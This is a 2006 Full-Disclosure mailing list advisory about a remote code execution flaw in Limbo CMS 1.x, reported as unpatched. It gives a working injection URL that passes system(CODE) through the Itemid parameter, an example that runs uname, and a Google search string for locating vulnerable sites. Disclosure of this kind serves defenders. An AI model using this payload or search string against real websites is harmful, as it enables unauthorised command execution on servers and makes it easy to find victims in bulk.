[Full-disclosure] Limbo CMS code execution
Alexander Hristov
joffer at gmail.com
Tue Feb 28 23:34:09 GMT 2006
Official page : http://www.limbo-cms.com/
Vulnerable : Limbo 1.*
Fix : No
Bug : http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(CODE)
example : index.php?option=frontpage&Itemid=system(uname)
Google search string : inurl:"option=frontpage"
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
Full-Disclosure is hosted and sponsored by Secunia.